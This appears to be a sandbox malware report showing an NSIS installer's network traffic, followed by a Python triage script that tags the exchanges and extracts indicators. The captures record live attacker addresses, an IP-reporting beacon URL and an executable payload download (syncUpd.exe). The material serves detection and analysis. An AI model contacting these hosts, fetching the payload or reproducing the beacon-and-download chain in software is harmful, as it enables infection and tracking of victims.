Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
iplogger.com | 104.21.12.138 | |
api.ipify.org | CNAME api4.ipify.org, A 104.237.62.212 | |

GET 200 https://iplogger.com/19nVA4
Request:
GET /19nVA4 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: iplogger.com
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:23:04 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: 513216652949678744=3; expires=Wed, 11 Dec 2024 10:23:04 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
set-cookie: clhf03028ja=175.208.134.152; expires=Wed, 11 Dec 2024 10:23:04 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.4202728271484375
expires: Mon, 11 Dec 2023 10:23:04 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YaS%2FpwNPYz58ZEYgEzNzD8ni4btPe%2BVS1YKg8KGVbEe4aW02sHqGFP8LCP6kITLrWj9Kfxc37kE08y40hIR2Y3O72Fj1P4rwtogU%2FOMyN%2FFxnfKwjH2QqWeW7SB2Mg0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 833d029299a52b73-LAX
alt-svc: h3=":443"; ma=86400

GET 200 http://api.ipify.org/?format=scc
Request:
GET /?format=scc HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: api.ipify.org
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.25.2
Date: Mon, 11 Dec 2023 10:23:00 GMT
Content-Type: text/plain
Content-Length: 15
Connection: keep-alive
Vary: Origin

GET 200 http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab
Request:
GET /scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 91.92.254.7
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:23:00 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

GET 200 http://5.42.64.35/syncUpd.exe
Request:
GET /syncUpd.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 5.42.64.35
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:23:01 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 11 Dec 2023 10:15:01 GMT
ETag: "2e600-60c3934fb849a"
Accept-Ranges: bytes
Content-Length: 189952
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

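All four fetches above carry the User-Agent NSIS_Inetc (Mozilla), the default of the NSIS INetC download plugin, so the traffic comes from an NSIS installer stub rather than a browser. Read together they form a short chain: learn the public address (iplogger.com and api.ipify.org; the iplogger response echoes the address back in its clhf03028ja cookie), report that same address to 91.92.254.7 via plus.php?ip=..., then pull syncUpd.exe (application/x-msdos-program, 189952 bytes) from 5.42.64.35. The script below is an added example and is not part of the sandbox output: it turns those observations into triage checks over the captured message heads. The sample exchanges are constructed from the report (start lines and the headers the checks use; no bodies were captured), and the IP_LOOKUP_HOSTS list and the tag names are assumptions of this example.

```python
"""Added example (not sandbox output): IOC triage over the HTTP exchanges above."""
import re
from urllib.parse import parse_qs, urlsplit

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Assumption: a short list of public "what is my IP" / IP-logger services.
IP_LOOKUP_HOSTS = {"api.ipify.org", "api4.ipify.org", "iplogger.com"}

# Constructed from the report above: (url, request head, response head).
# Only the headers the checks look at are reproduced; no bodies were captured.
SAMPLE_EXCHANGES = [
    ("https://iplogger.com/19nVA4",
     "GET /19nVA4 HTTP/1.1\r\nUser-Agent: NSIS_Inetc (Mozilla)\r\nHost: iplogger.com\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n"
     "set-cookie: clhf03028ja=175.208.134.152; path=/; secure; HttpOnly\r\n"),
    ("http://api.ipify.org/?format=scc",
     "GET /?format=scc HTTP/1.1\r\nUser-Agent: NSIS_Inetc (Mozilla)\r\nHost: api.ipify.org\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nContent-Length: 15\r\n"),
    ("http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab",
     "GET /scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab HTTP/1.1\r\n"
     "User-Agent: NSIS_Inetc (Mozilla)\r\nHost: 91.92.254.7\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 1\r\n"),
    ("http://5.42.64.35/syncUpd.exe",
     "GET /syncUpd.exe HTTP/1.1\r\nUser-Agent: NSIS_Inetc (Mozilla)\r\nHost: 5.42.64.35\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: application/x-msdos-program\r\n"
     "Content-Length: 189952\r\n"),
]


def parse_headers(raw):
    """Split an HTTP message head into (start line, {lower-case name: [values]})."""
    lines = [ln for ln in raw.split("\r\n") if ln]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def is_exe_download(url_parts, resp_headers):
    """PE served by MIME type, or a URL whose path ends in .exe."""
    ctype = " ".join(resp_headers.get("content-type", [])).lower()
    return ctype.startswith("application/x-msdos-program") or url_parts.path.lower().endswith(".exe")


def triage(exchanges, ip_lookup_hosts=IP_LOOKUP_HOSTS):
    """Tag each exchange; returns {url: sorted tags}.

    Pass 1 collects every IPv4 literal a server sent back (here the value of the
    iplogger clhf03028ja cookie). Pass 2 flags requests that send one of those
    addresses out again in a query string, which is what the plus.php beacon does.
    """
    learned_ips = set()
    for _, _, resp in exchanges:
        _, rh = parse_headers(resp)
        for values in rh.values():
            for v in values:
                learned_ips.update(IPV4.findall(v))

    report = {}
    for url, req, resp in exchanges:
        tags = set()
        _, reqh = parse_headers(req)
        _, resph = parse_headers(resp)
        parts = urlsplit(url)
        host = parts.hostname or ""
        if " ".join(reqh.get("user-agent", [])).startswith("NSIS_Inetc"):
            tags.add("nsis-inetc-ua")      # default UA of the NSIS INetC download plugin
        if IPV4.fullmatch(host):
            tags.add("bare-ip-host")
        if host in ip_lookup_hosts:
            tags.add("ip-lookup-service")
        if is_exe_download(parts, resph):
            tags.add("executable-download")
        for values in parse_qs(parts.query).values():
            for v in values:
                if IPV4.fullmatch(v):
                    tags.add("ip-in-query")
                    if v in learned_ips:
                        tags.add("reflects-ip-learned-earlier")
        report[url] = sorted(tags)
    return report


def extract_iocs(exchanges):
    """Hostnames, bare IPs and payload URLs worth blocking or hunting for."""
    hosts, ips, payloads = set(), set(), set()
    for url, _, resp in exchanges:
        parts = urlsplit(url)
        host = parts.hostname or ""
        (ips if IPV4.fullmatch(host) else hosts).add(host)
        if is_exe_download(parts, parse_headers(resp)[1]):
            payloads.add(url)
    return {"hosts": sorted(hosts), "ips": sorted(ips), "payloads": sorted(payloads)}


if __name__ == "__main__":
    for url, tags in triage(SAMPLE_EXCHANGES).items():
        print(url, tags)
    print(extract_iocs(SAMPLE_EXCHANGES))
```

Run it with python3 to print the tags per URL and the IOC lists. The reflects-ip-learned-earlier tag is the one worth turning into a rule: an installer that sends out the address an IP logger just handed it is beaconing, whichever host it reports to, and the check does not depend on the attacker's hostnames or IPs staying the same.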
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49171 172.67.194.188:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=iplogger.com | c1:91:92:9b:9a:80:29:75:dc:65:9b:a4:c0:11:8c:ac:72:d6:77:58 |
Snort Alerts
No Snort Alerts